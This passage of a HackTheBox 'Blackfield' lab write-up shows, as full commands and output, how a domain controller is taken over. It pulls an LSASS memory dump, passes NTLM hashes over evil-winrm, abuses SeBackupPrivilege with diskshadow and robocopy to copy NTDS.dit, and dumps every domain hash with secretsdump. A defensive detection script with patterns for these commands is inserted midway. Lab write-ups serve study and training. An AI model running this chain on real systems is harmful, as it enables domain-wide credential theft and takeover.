Verify the new credentials and list the shares:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u 'audit2020' -p 'KaaDa@2026!' --shares
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\audit2020:KaaDa@2026!
SMB 10.129.229.17 445 DC01 [*] Enumerated shares
SMB 10.129.229.17 445 DC01 Share Permissions Remark
SMB 10.129.229.17 445 DC01 ----- ----------- ------
SMB 10.129.229.17 445 DC01 ADMIN$ Remote Admin
SMB 10.129.229.17 445 DC01 C$ Default share
SMB 10.129.229.17 445 DC01 forensic READ Forensic / Audit share.
SMB 10.129.229.17 445 DC01 IPC$ READ Remote IPC
SMB 10.129.229.17 445 DC01 NETLOGON READ Logon server share
SMB 10.129.229.17 445 DC01 profiles$ READ
SMB 10.129.229.17 445 DC01 SYSVOL READ Logon server share

The forensic share is now readable.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -U audit2020 //10.129.229.17/forensic
Password for [WORKGROUP\audit2020]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 23 13:03:16 2020
.. D 0 Sun Feb 23 13:03:16 2020
commands_output D 0 Sun Feb 23 18:14:37 2020
memory_analysis D 0 Thu May 28 20:28:33 2020
tools D 0 Sun Feb 23 13:39:08 2020

5102079 blocks of size 4096. 1691631 blocks available
smb: \>

smb: \> cd memory_analysis\
smb: \memory_analysis\> dir
. D 0 Thu May 28 20:28:33 2020
.. D 0 Thu May 28 20:28:33 2020
conhost.zip A 37876530 Thu May 28 20:25:36 2020
ctfmon.zip A 24962333 Thu May 28 20:25:45 2020
dfsrs.zip A 23993305 Thu May 28 20:25:54 2020
dllhost.zip A 18366396 Thu May 28 20:26:04 2020
ismserv.zip A 8810157 Thu May 28 20:26:13 2020
lsass.zip A 41936098 Thu May 28 20:25:08 2020
mmc.zip A 64288607 Thu May 28 20:25:25 2020
RuntimeBroker.zip A 13332174 Thu May 28 20:26:24 2020
ServerManager.zip A 131983313 Thu May 28 20:26:49 2020
sihost.zip A 33141744 Thu May 28 20:27:00 2020
smartscreen.zip A 33756344 Thu May 28 20:27:11 2020
svchost.zip A 14408833 Thu May 28 20:27:19 2020
taskhostw.zip A 34631412 Thu May 28 20:27:30 2020
winlogon.zip A 14255089 Thu May 28 20:27:38 2020
wlms.zip A 4067425 Thu May 28 20:27:44 2020
WmiPrvSE.zip A 18303252 Thu May 28 20:27:53 2020

5102079 blocks of size 4096. 1691631 blocks available
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\>

Retrieve lsass.zip. smbclient's get timed out (NT_STATUS_IO_TIMEOUT), so fetch it with nxc instead:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u 'audit2020' -p 'KaaDa@2026!' --share forensic --get-file '\memory_analysis\lsass.zip' lsass.zip

Parse the minidump locally:

unzip lsass.zip
pypykatz lsa minidump lsass.DMP

The domain admin hash recovered from the dump is a decoy and does not authenticate.

The svc_backup hash, however, is valid.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
WINRM 10.129.229.17 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM 10.129.229.17 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)

The account also has remote management rights, so log in with evil-winrm:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i 10.129.229.17 -u 'svc_backup' -H 9658d1d1dcd9250115e2205d9f48400d

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ..\desktop\user.txt
3920bb317a0bef51027e2852be64b543
*Evil-WinRM* PS C:\Users\svc_backup\Documents>

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all

USER INFORMATION
----------------

User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_backup\Documents>

The account holds SeBackupPrivilege and SeRestorePrivilege (it is a member of Backup Operators).

So we can simply back up NTDS.dit and the SYSTEM hive directly.

With SeBackupPrivilege we can create and access a volume shadow copy, copy NTDS.dit + SYSTEM out of it, and parse them offline to recover the Administrator hash.

Export the SYSTEM registry hive

*Evil-WinRM* PS C:\Users\svc_backup\Documents> robocopy /b C:\Windows\NTDS C:\Users\svc_backup\Documents\temp ntds.dit

-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------

Started : Monday, June 22, 2026 3:51:32 AM
Source : C:\Windows\NTDS\
Dest : C:\Users\svc_backup\Documents\temp\

Files : ntds.dit

Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

1 C:\Windows\NTDS\
New File 18.0 m ntds.dit
2026/06/22 03:51:32 ERROR 32 (0x00000020) Copying File C:\Windows\NTDS\ntds.dit
The process cannot access the file because it is being used by another process.

The live ntds.dit is locked by the directory service (ERROR 32), so snapshot the volume with diskshadow instead:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# printf 'set context persistent nowriters\r\nadd volume c: alias cdrive\r\ncreate\r\nexpose %%cdrive%% z:\r\n' > dshadow.txt
*Evil-WinRM* PS C:\> cd temp
*Evil-WinRM* PS C:\temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
*Evil-WinRM* PS C:\temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> diskshadow.exe /s c:\temp\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 6/22/2026 3:53:53 AM

-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {d9297eac-45d1-4ff5-9f89-55b241392c02} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {1c928807-c8cf-4d93-a029-ad88f5f6fb64} set as environment variable.

Querying all shadow copies with the shadow copy set ID {1c928807-c8cf-4d93-a029-ad88f5f6fb64}

* Shadow copy ID = {d9297eac-45d1-4ff5-9f89-55b241392c02} %temp%
- Shadow copy set: {1c928807-c8cf-4d93-a029-ad88f5f6fb64} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 6/22/2026 3:53:54 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {d9297eac-45d1-4ff5-9f89-55b241392c02}
The shadow copy was successfully exposed as z:\.
->

Verify that the shadow copy is mounted:

*Evil-WinRM* PS C:\temp> ls z:\


Directory: z:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/26/2020 5:38 PM PerfLogs
d----- 6/3/2020 9:47 AM profiles
d-r--- 3/19/2020 11:08 AM Program Files
d----- 2/1/2020 11:05 AM Program Files (x86)
d----- 6/22/2026 3:53 AM temp
d-r--- 2/23/2020 9:16 AM Users
d----- 9/21/2020 4:29 PM Windows
-a---- 2/28/2020 4:36 PM 447 notes.txt



*Evil-WinRM* PS C:\temp> robocopy /b Z:\Windows\NTDS C:\temp NTDS.dit

-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------

Started : Monday, June 22, 2026 3:54:52 AM
Source : Z:\Windows\NTDS\
Dest : C:\temp\

Files : NTDS.dit

Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

1 Z:\Windows\NTDS\
New File 18.0 m ntds.dit
100%
100%

------------------------------------------------------------------------------

Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 18.00 m 18.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00


Speed : 152212645 Bytes/sec.
Speed : 8709.677 MegaBytes/min.
Ended : Monday, June 22, 2026 3:54:52 AM


*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Windows\Tasks\SYSTEM
The operation completed successfully.


*Evil-WinRM* PS C:\temp> download ntds.dit

Info: Downloading C:\temp\ntds.dit to ntds.dit

Info: Download successful!

There are a few minor pitfalls as well; for instance evil-winrm's download assembles an invalid path for the file saved under C:\Windows\Tasks, so move it into the current directory first:

*Evil-WinRM* PS C:\temp> move C:\Windows\Tasks\SYSTEM C:\temp\SYSTEM
*Evil-WinRM* PS C:\temp> dir


*Evil-WinRM* PS C:\temp> download SYSTEM

Info: Downloading C:\temp\SYSTEM to SYSTEM

Info: Download successful!
*Evil-WinRM* PS C:\temp>
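The two abuses chained on this box, the ForceChangePassword reset of audit2020 and the Backup Operators VSS/robocopy/reg save extraction of NTDS.dit and SYSTEM, leave a distinctive trail in the DC's Security log. The following Python example is added here and is not part of the original writeup or any tool it uses; it correlates constructed 4724/4672/4688 events to surface that trail, and the KNOWN_ADMINS set, the logon ids and every sample value are assumptions.

```python
"""Added example (not from the writeup): correlate Windows Security events
to surface the chain used on this box from the defender's side:
  4724  password reset issued by a non-admin (ForceChangePassword abuse)
  4672  SeBackupPrivilege granted to a logon that is not a known admin
  4688  diskshadow /s, robocopy /b against NTDS, reg save of the SYSTEM hive
Field names follow the Security log; all values below are constructed."""
import re
from collections import defaultdict

# Accounts expected to hold these rights on the DC (assumption for the example).
KNOWN_ADMINS = {"administrator", "dc01$"}

# Command-line indicators matching the commands the writeup runs on DC01.
PROC_PATTERNS = {
    "vss_snapshot": re.compile(r"diskshadow(\.exe)?\s+/s\b", re.I),
    "ntds_copy":    re.compile(r"robocopy\s+/b\b.*\bntds\b", re.I),
    "system_hive":  re.compile(r"reg(\.exe)?\s+save\s+hklm\\system\b", re.I),
}


def analyze(events):
    """Return (severity, message) alerts; critical when one logon that got
    SeBackupPrivilege also ran two or more of the extraction indicators."""
    alerts = []
    backup_logons = set()        # logon ids that received SeBackupPrivilege
    hits = defaultdict(set)      # logon id -> indicator names seen in 4688
    for e in events:
        eid = e["EventID"]
        user = e.get("SubjectUserName", "").lower()
        if eid == 4724 and user not in KNOWN_ADMINS:
            alerts.append(("high", f"4724: {user} reset the password of "
                                   f"{e['TargetUserName']} (ACL abuse?)"))
        elif (eid == 4672 and user not in KNOWN_ADMINS
              and "SeBackupPrivilege" in e["PrivilegeList"]):
            backup_logons.add(e["SubjectLogonId"])
            alerts.append(("medium", f"4672: {user} logged on with SeBackupPrivilege"))
        elif eid == 4688:
            for name, pat in PROC_PATTERNS.items():
                if pat.search(e["CommandLine"]):
                    hits[e["SubjectLogonId"]].add(name)
    for logon, names in hits.items():
        sev = "critical" if logon in backup_logons and len(names) >= 2 else "medium"
        alerts.append((sev, f"4688: logon {logon} ran {sorted(names)}"))
    return alerts


# Constructed sample events mirroring the writeup's steps (values are invented).
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "support", "TargetUserName": "audit2020"},
    {"EventID": 4672, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x3e7a1",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"EventID": 4688, "SubjectLogonId": "0x3e7a1",
     "CommandLine": r"diskshadow.exe /s c:\temp\diskshadow.txt"},
    {"EventID": 4688, "SubjectLogonId": "0x3e7a1",
     "CommandLine": r"robocopy /b Z:\Windows\NTDS C:\temp NTDS.dit"},
    {"EventID": 4688, "SubjectLogonId": "0x3e7a1",
     "CommandLine": r"reg save hklm\system c:\Windows\Tasks\SYSTEM"},
    {"EventID": 4688, "SubjectLogonId": "0x5b2",      # benign: no NTDS in the path
     "CommandLine": r"robocopy /b D:\share E:\backup *.docx"},
]

if __name__ == "__main__":
    for sev, msg in analyze(SAMPLE_EVENTS):
        print(f"[{sev}] {msg}")
```

Process creation auditing with command-line logging must be enabled for the 4688 part to fire, and Backup Operators membership on a domain controller is worth reviewing on its own.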

Extract the hashes locally with secretsdump:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i 10.129.229.17 -u 'administrator' -H 184fb5e5178480be64824d4cd53b99ee

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\desktop\root.txt
4375a629c7c67c8e29db269060c955cb
*Evil-WinRM* PS C:\Users\Administrator\Documents>


HackTheBox-Blackfield
http://example.com/2026/06/22/HackTheBox-Blackfield/
Author: Skyarrow
Posted on: June 22, 2026
Licensed under